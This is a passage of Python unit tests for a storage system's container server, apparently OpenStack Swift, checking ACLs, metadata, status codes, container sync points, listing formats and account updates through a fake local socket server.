{'devices': self.testdir, 'mount_check': 'false'})
def tearDown(self):
"""Tear down for testing swift.object_server.ObjectController"""
rmtree(os.path.dirname(self.testdir), ignore_errors=1)
def test_acl_container(self):
# Ensure no acl by default
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '0'})
resp = req.get_response(self.controller)
self.assert_(resp.status.startswith('201'))
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'HEAD'})
response = req.get_response(self.controller)
self.assert_(response.status.startswith('204'))
self.assert_('x-container-read' not in response.headers)
self.assert_('x-container-write' not in response.headers)
# Ensure POSTing acls works
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': '1', 'X-Container-Read': '.r:*',
'X-Container-Write': 'account:user'})
resp = req.get_response(self.controller)
self.assert_(resp.status.startswith('204'))
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'HEAD'})
response = req.get_response(self.controller)
self.assert_(response.status.startswith('204'))
self.assertEquals(response.headers.get('x-container-read'), '.r:*')
self.assertEquals(response.headers.get('x-container-write'),
'account:user')
# Ensure we can clear acls on POST
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': '3', 'X-Container-Read': '',
'X-Container-Write': ''})
resp = req.get_response(self.controller)
self.assert_(resp.status.startswith('204'))
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'HEAD'})
response = req.get_response(self.controller)
self.assert_(response.status.startswith('204'))
self.assert_('x-container-read' not in response.headers)
self.assert_('x-container-write' not in response.headers)
# Ensure PUTing acls works
req = Request.blank(
'/sda1/p/a/c2', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '4', 'X-Container-Read': '.r:*',
'X-Container-Write': 'account:user'})
resp = req.get_response(self.controller)
self.assert_(resp.status.startswith('201'))
req = Request.blank('/sda1/p/a/c2', environ={'REQUEST_METHOD': 'HEAD'})
response = req.get_response(self.controller)
self.assert_(response.status.startswith('204'))
self.assertEquals(response.headers.get('x-container-read'), '.r:*')
self.assertEquals(response.headers.get('x-container-write'),
'account:user')
def test_HEAD(self):
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
req.get_response(self.controller)
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'HEAD',
'HTTP_X_TIMESTAMP': '0'})
response = req.get_response(self.controller)
self.assert_(response.status.startswith('204'))
self.assertEquals(int(response.headers['x-container-bytes-used']), 0)
self.assertEquals(int(response.headers['x-container-object-count']), 0)
req2 = Request.blank(
'/sda1/p/a/c/o', environ={
'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1', 'HTTP_X_SIZE': 42,
'HTTP_X_CONTENT_TYPE': 'text/plain', 'HTTP_X_ETAG': 'x'})
req2.get_response(self.controller)
response = req.get_response(self.controller)
self.assertEquals(int(response.headers['x-container-bytes-used']), 42)
self.assertEquals(int(response.headers['x-container-object-count']), 1)
def test_HEAD_not_found(self):
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
def test_HEAD_invalid_partition(self):
req = Request.blank('/sda1/./a/c', environ={'REQUEST_METHOD': 'HEAD',
'HTTP_X_TIMESTAMP': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 400)
def test_HEAD_insufficient_storage(self):
self.controller = container_server.ContainerController(
{'devices': self.testdir})
req = Request.blank(
'/sda-null/p/a/c', environ={'REQUEST_METHOD': 'HEAD',
'HTTP_X_TIMESTAMP': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 507)
def test_HEAD_invalid_content_type(self):
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'HEAD'},
headers={'Accept': 'application/plain'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 406)
def test_HEAD_invalid_format(self):
format = '%D1%BD%8A9' # invalid UTF-8; should be %E1%BD%8A9 (E -> D)
req = Request.blank(
'/sda1/p/a/c?format=' + format,
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 400)
def test_PUT(self):
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '2'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 202)
def test_PUT_obj_not_found(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '1', 'X-Size': '0',
'X-Content-Type': 'text/plain', 'X-ETag': 'e'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
def test_PUT_GET_metadata(self):
# Set metadata header
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(1),
'X-Container-Meta-Test': 'Value'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
self.assertEquals(resp.headers.get('x-container-meta-test'), 'Value')
# Set another metadata header, ensuring old one doesn't disappear
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(1),
'X-Container-Meta-Test2': 'Value2'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
self.assertEquals(resp.headers.get('x-container-meta-test'), 'Value')
self.assertEquals(resp.headers.get('x-container-meta-test2'), 'Value2')
# Update metadata header
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(3),
'X-Container-Meta-Test': 'New Value'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 202)
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
self.assertEquals(resp.headers.get('x-container-meta-test'),
'New Value')
# Send old update to metadata header
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(2),
'X-Container-Meta-Test': 'Old Value'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 202)
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
self.assertEquals(resp.headers.get('x-container-meta-test'),
'New Value')
# Remove metadata header (by setting it to empty)
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(4),
'X-Container-Meta-Test': ''})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 202)
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
self.assert_('x-container-meta-test' not in resp.headers)
def test_PUT_invalid_partition(self):
req = Request.blank('/sda1/./a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 400)
def test_PUT_timestamp_not_float(self):
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
req.get_response(self.controller)
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 'not-float'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 400)
def test_PUT_insufficient_storage(self):
self.controller = container_server.ContainerController(
{'devices': self.testdir})
req = Request.blank(
'/sda-null/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 507)
def test_POST_HEAD_metadata(self):
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(1)})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
# Set metadata header
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(1),
'X-Container-Meta-Test': 'Value'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
self.assertEquals(resp.headers.get('x-container-meta-test'), 'Value')
# Update metadata header
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(3),
'X-Container-Meta-Test': 'New Value'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
self.assertEquals(resp.headers.get('x-container-meta-test'),
'New Value')
# Send old update to metadata header
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(2),
'X-Container-Meta-Test': 'Old Value'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
self.assertEquals(resp.headers.get('x-container-meta-test'),
'New Value')
# Remove metadata header (by setting it to empty)
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(4),
'X-Container-Meta-Test': ''})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
self.assert_('x-container-meta-test' not in resp.headers)
def test_POST_invalid_partition(self):
req = Request.blank('/sda1/./a/c', environ={'REQUEST_METHOD': 'POST',
'HTTP_X_TIMESTAMP': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 400)
def test_POST_timestamp_not_float(self):
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
req.get_response(self.controller)
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': 'not-float'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 400)
def test_POST_insufficient_storage(self):
self.controller = container_server.ContainerController(
{'devices': self.testdir})
req = Request.blank(
'/sda-null/p/a/c', environ={'REQUEST_METHOD': 'POST',
'HTTP_X_TIMESTAMP': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 507)
def test_POST_invalid_container_sync_to(self):
self.controller = container_server.ContainerController(
{'devices': self.testdir})
req = Request.blank(
'/sda-null/p/a/c', environ={'REQUEST_METHOD': 'POST',
'HTTP_X_TIMESTAMP': '1'},
headers={'x-container-sync-to': '192.168.0.1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 400)
def test_POST_after_DELETE_not_found(self):
req = Request.blank('/sda1/p/a/c',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '1'})
resp = req.get_response(self.controller)
req = Request.blank('/sda1/p/a/c',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': '2'})
resp = req.get_response(self.controller)
req = Request.blank('/sda1/p/a/c/',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': '3'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
def test_DELETE_obj_not_found(self):
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
def test_DELETE_container_not_found(self):
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'DELETE',
'HTTP_X_TIMESTAMP': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
def test_PUT_utf8(self):
snowman = u'\u2603'
container_name = snowman.encode('utf-8')
req = Request.blank(
'/sda1/p/a/%s' % container_name, environ={
'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
def test_account_update_mismatched_host_device(self):
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1'},
headers={'X-Timestamp': '0000000001.00000',
'X-Account-Host': '127.0.0.1:0',
'X-Account-Partition': '123',
'X-Account-Device': 'sda1,sda2'})
broker = self.controller._get_container_broker('sda1', 'p', 'a', 'c')
resp = self.controller.account_update(req, 'a', 'c', broker)
self.assertEquals(resp.status_int, 400)
def test_account_update_account_override_deleted(self):
bindsock = listen(('127.0.0.1', 0))
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1'},
headers={'X-Timestamp': '0000000001.00000',
'X-Account-Host': '%s:%s' %
bindsock.getsockname(),
'X-Account-Partition': '123',
'X-Account-Device': 'sda1',
'X-Account-Override-Deleted': 'yes'})
with save_globals():
new_connect = fake_http_connect(200, count=123)
swift.container.server.http_connect = new_connect
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
def test_PUT_account_update(self):
bindsock = listen(('127.0.0.1', 0))
def accept(return_code, expected_timestamp):
try:
with Timeout(3):
sock, addr = bindsock.accept()
inc = sock.makefile('rb')
out = sock.makefile('wb')
out.write('HTTP/1.1 %d OK\r\nContent-Length: 0\r\n\r\n' %
return_code)
out.flush()
self.assertEquals(inc.readline(),
'PUT /sda1/123/a/c HTTP/1.1\r\n')
headers = {}
line = inc.readline()
while line and line != '\r\n':
headers[line.split(':')[0].lower()] = \
line.split(':')[1].strip()
line = inc.readline()
self.assertEquals(headers['x-put-timestamp'],
expected_timestamp)
except BaseException as err:
return err
return None
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '0000000001.00000',
'X-Account-Host': '%s:%s' % bindsock.getsockname(),
'X-Account-Partition': '123',
'X-Account-Device': 'sda1'})
event = spawn(accept, 201, '0000000001.00000')
try:
with Timeout(3):
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
finally:
err = event.wait()
if err:
raise Exception(err)
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': '2'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '0000000003.00000',
'X-Account-Host': '%s:%s' % bindsock.getsockname(),
'X-Account-Partition': '123',
'X-Account-Device': 'sda1'})
event = spawn(accept, 404, '0000000003.00000')
try:
with Timeout(3):
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
finally:
err = event.wait()
if err:
raise Exception(err)
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '0000000005.00000',
'X-Account-Host': '%s:%s' % bindsock.getsockname(),
'X-Account-Partition': '123',
'X-Account-Device': 'sda1'})
event = spawn(accept, 503, '0000000005.00000')
got_exc = False
try:
with Timeout(3):
resp = req.get_response(self.controller)
except BaseException as err:
got_exc = True
finally:
err = event.wait()
if err:
raise Exception(err)
self.assert_(not got_exc)
def test_PUT_reset_container_sync(self):
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT'},
headers={'x-timestamp': '1',
'x-container-sync-to': 'http://127.0.0.1:12345/v1/a/c'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
db = self.controller._get_container_broker('sda1', 'p', 'a', 'c')
info = db.get_info()
self.assertEquals(info['x_container_sync_point1'], -1)
self.assertEquals(info['x_container_sync_point2'], -1)
db.set_x_container_sync_points(123, 456)
info = db.get_info()
self.assertEquals(info['x_container_sync_point1'], 123)
self.assertEquals(info['x_container_sync_point2'], 456)
# Set to same value
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT'},
headers={'x-timestamp': '1',
'x-container-sync-to': 'http://127.0.0.1:12345/v1/a/c'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 202)
db = self.controller._get_container_broker('sda1', 'p', 'a', 'c')
info = db.get_info()
self.assertEquals(info['x_container_sync_point1'], 123)
self.assertEquals(info['x_container_sync_point2'], 456)
# Set to new value
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT'},
headers={'x-timestamp': '1',
'x-container-sync-to': 'http://127.0.0.1:12345/v1/a/c2'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 202)
db = self.controller._get_container_broker('sda1', 'p', 'a', 'c')
info = db.get_info()
self.assertEquals(info['x_container_sync_point1'], -1)
self.assertEquals(info['x_container_sync_point2'], -1)
def test_POST_reset_container_sync(self):
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT'},
headers={'x-timestamp': '1',
'x-container-sync-to': 'http://127.0.0.1:12345/v1/a/c'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
db = self.controller._get_container_broker('sda1', 'p', 'a', 'c')
info = db.get_info()
self.assertEquals(info['x_container_sync_point1'], -1)
self.assertEquals(info['x_container_sync_point2'], -1)
db.set_x_container_sync_points(123, 456)
info = db.get_info()
self.assertEquals(info['x_container_sync_point1'], 123)
self.assertEquals(info['x_container_sync_point2'], 456)
# Set to same value
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'POST'},
headers={'x-timestamp': '1',
'x-container-sync-to': 'http://127.0.0.1:12345/v1/a/c'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
db = self.controller._get_container_broker('sda1', 'p', 'a', 'c')
info = db.get_info()
self.assertEquals(info['x_container_sync_point1'], 123)
self.assertEquals(info['x_container_sync_point2'], 456)
# Set to new value
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'POST'},
headers={'x-timestamp': '1',
'x-container-sync-to': 'http://127.0.0.1:12345/v1/a/c2'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
db = self.controller._get_container_broker('sda1', 'p', 'a', 'c')
info = db.get_info()
self.assertEquals(info['x_container_sync_point1'], -1)
self.assertEquals(info['x_container_sync_point2'], -1)
def test_DELETE(self):
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'PUT'}, headers={'X-Timestamp': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'DELETE'}, headers={'X-Timestamp': '2'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'GET'}, headers={'X-Timestamp': '3'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
def test_DELETE_not_found(self):
# Even if the container wasn't previously heard of, the container
# server will accept the delete and replicate it to where it belongs
# later.
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'DELETE', 'HTTP_X_TIMESTAMP': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
def test_DELETE_object(self):
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'PUT'}, headers={'X-Timestamp': '2'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT', 'HTTP_X_TIMESTAMP': '0',
'HTTP_X_SIZE': 1, 'HTTP_X_CONTENT_TYPE': 'text/plain',
'HTTP_X_ETAG': 'x'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'DELETE'}, headers={'X-Timestamp': '3'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 409)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'}, headers={'X-Timestamp': '4'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'DELETE'}, headers={'X-Timestamp': '5'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'GET'}, headers={'X-Timestamp': '6'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
    def test_DELETE_account_update(self):
        # Deleting a container must notify the account server named in the
        # X-Account-* headers; this test fakes that account server on a
        # local socket and checks how its response code surfaces.
        bindsock = listen(('127.0.0.1', 0))
        def accept(return_code, expected_timestamp):
            # One-shot fake account server: reply with `return_code`, then
            # verify the replicated PUT carried the expected
            # x-delete-timestamp header.
            try:
                with Timeout(3):
                    sock, addr = bindsock.accept()
                    inc = sock.makefile('rb')
                    out = sock.makefile('wb')
                    out.write('HTTP/1.1 %d OK\r\nContent-Length: 0\r\n\r\n' %
                              return_code)
                    out.flush()
                    self.assertEquals(inc.readline(),
                                      'PUT /sda1/123/a/c HTTP/1.1\r\n')
                    headers = {}
                    line = inc.readline()
                    # Collect request headers until the blank line.
                    while line and line != '\r\n':
                        headers[line.split(':')[0].lower()] = \
                            line.split(':')[1].strip()
                        line = inc.readline()
                    self.assertEquals(headers['x-delete-timestamp'],
                                      expected_timestamp)
            except BaseException as err:
                # Hand any failure back to the spawning greenthread; raising
                # here would be lost.
                return err
            return None
        req = Request.blank(
            '/sda1/p/a/c',
            environ={'REQUEST_METHOD': 'PUT'}, headers={'X-Timestamp': '1'})
        resp = req.get_response(self.controller)
        self.assertEquals(resp.status_int, 201)
        # Account server answers 204: delete succeeds normally.
        req = Request.blank(
            '/sda1/p/a/c',
            environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': '0000000002.00000',
                     'X-Account-Host': '%s:%s' % bindsock.getsockname(),
                     'X-Account-Partition': '123',
                     'X-Account-Device': 'sda1'})
        event = spawn(accept, 204, '0000000002.00000')
        try:
            with Timeout(3):
                resp = req.get_response(self.controller)
                self.assertEquals(resp.status_int, 204)
        finally:
            err = event.wait()
            if err:
                raise Exception(err)
        req = Request.blank(
            '/sda1/p/a/c',
            environ={'REQUEST_METHOD': 'PUT', 'HTTP_X_TIMESTAMP': '2'})
        resp = req.get_response(self.controller)
        self.assertEquals(resp.status_int, 201)
        # Account server answers 404.
        req = Request.blank(
            '/sda1/p/a/c',
            environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': '0000000003.00000',
                     'X-Account-Host': '%s:%s' % bindsock.getsockname(),
                     'X-Account-Partition': '123',
                     'X-Account-Device': 'sda1'})
        event = spawn(accept, 404, '0000000003.00000')
        try:
            with Timeout(3):
                resp = req.get_response(self.controller)
                self.assertEquals(resp.status_int, 404)
        finally:
            err = event.wait()
            if err:
                raise Exception(err)
        req = Request.blank(
            '/sda1/p/a/c',
            environ={'REQUEST_METHOD': 'PUT', 'HTTP_X_TIMESTAMP': '4'})
        resp = req.get_response(self.controller)
        self.assertEquals(resp.status_int, 201)
        # Account server answers 503: the delete must not raise to the
        # client.
        req = Request.blank(
            '/sda1/p/a/c',
            environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': '0000000005.00000',
                     'X-Account-Host': '%s:%s' % bindsock.getsockname(),
                     'X-Account-Partition': '123',
                     'X-Account-Device': 'sda1'})
        event = spawn(accept, 503, '0000000005.00000')
        got_exc = False
        try:
            with Timeout(3):
                resp = req.get_response(self.controller)
        except BaseException as err:
            got_exc = True
        finally:
            err = event.wait()
            if err:
                raise Exception(err)
        self.assert_(not got_exc)
def test_DELETE_invalid_partition(self):
req = Request.blank(
'/sda1/./a/c', environ={'REQUEST_METHOD': 'DELETE',
'HTTP_X_TIMESTAMP': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 400)
def test_DELETE_timestamp_not_float(self):
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
req.get_response(self.controller)
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': 'not-float'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 400)
def test_DELETE_insufficient_storage(self):
self.controller = container_server.ContainerController(
{'devices': self.testdir})
req = Request.blank(
'/sda-null/p/a/c', environ={'REQUEST_METHOD': 'DELETE',
'HTTP_X_TIMESTAMP': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 507)
def test_GET_over_limit(self):
req = Request.blank(
'/sda1/p/a/c?limit=%d' %
(container_server.CONTAINER_LISTING_LIMIT + 1),
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 412)
def test_GET_json(self):
# make a container
req = Request.blank(
'/sda1/p/a/jsonc', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
# test an empty container
req = Request.blank(
'/sda1/p/a/jsonc?format=json',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 200)
self.assertEquals(simplejson.loads(resp.body), [])
# fill the container
for i in range(3):
req = Request.blank(
'/sda1/p/a/jsonc/%s' % i, environ={
'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1',
'HTTP_X_CONTENT_TYPE': 'text/plain',
'HTTP_X_ETAG': 'x',
'HTTP_X_SIZE': 0})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
# test format
json_body = [{"name": "0",
"hash": "x",
"bytes": 0,
"content_type": "text/plain",
"last_modified": "1970-01-01T00:00:01.000000"},
{"name": "1",
"hash": "x",
"bytes": 0,
"content_type": "text/plain",
"last_modified": "1970-01-01T00:00:01.000000"},
{"name": "2",
"hash": "x",
"bytes": 0,
"content_type": "text/plain",
"last_modified": "1970-01-01T00:00:01.000000"}]
req = Request.blank(
'/sda1/p/a/jsonc?format=json',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'application/json')
self.assertEquals(simplejson.loads(resp.body), json_body)
self.assertEquals(resp.charset, 'utf-8')
req = Request.blank(
'/sda1/p/a/jsonc?format=json',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'application/json')
for accept in ('application/json', 'application/json;q=1.0,*/*;q=0.9',
'*/*;q=0.9,application/json;q=1.0', 'application/*'):
req = Request.blank(
'/sda1/p/a/jsonc',
environ={'REQUEST_METHOD': 'GET'})
req.accept = accept
resp = req.get_response(self.controller)
self.assertEquals(
simplejson.loads(resp.body), json_body,
'Invalid body for Accept: %s' % accept)
self.assertEquals(
resp.content_type, 'application/json',
'Invalid content_type for Accept: %s' % accept)
req = Request.blank(
'/sda1/p/a/jsonc',
environ={'REQUEST_METHOD': 'HEAD'})
req.accept = accept
resp = req.get_response(self.controller)
self.assertEquals(
resp.content_type, 'application/json',
'Invalid content_type for Accept: %s' % accept)
def test_GET_plain(self):
# make a container
req = Request.blank(
'/sda1/p/a/plainc', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
# test an empty container
req = Request.blank(
'/sda1/p/a/plainc', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
# fill the container
for i in range(3):
req = Request.blank(
'/sda1/p/a/plainc/%s' % i, environ={
'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1',
'HTTP_X_CONTENT_TYPE': 'text/plain',
'HTTP_X_ETAG': 'x',
'HTTP_X_SIZE': 0})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
plain_body = '0\n1\n2\n'
req = Request.blank('/sda1/p/a/plainc',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'text/plain')
self.assertEquals(resp.body, plain_body)
self.assertEquals(resp.charset, 'utf-8')
req = Request.blank('/sda1/p/a/plainc',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'text/plain')
for accept in ('', 'text/plain', 'application/xml;q=0.8,*/*;q=0.9',
'*/*;q=0.9,application/xml;q=0.8', '*/*',
'text/plain,application/xml'):
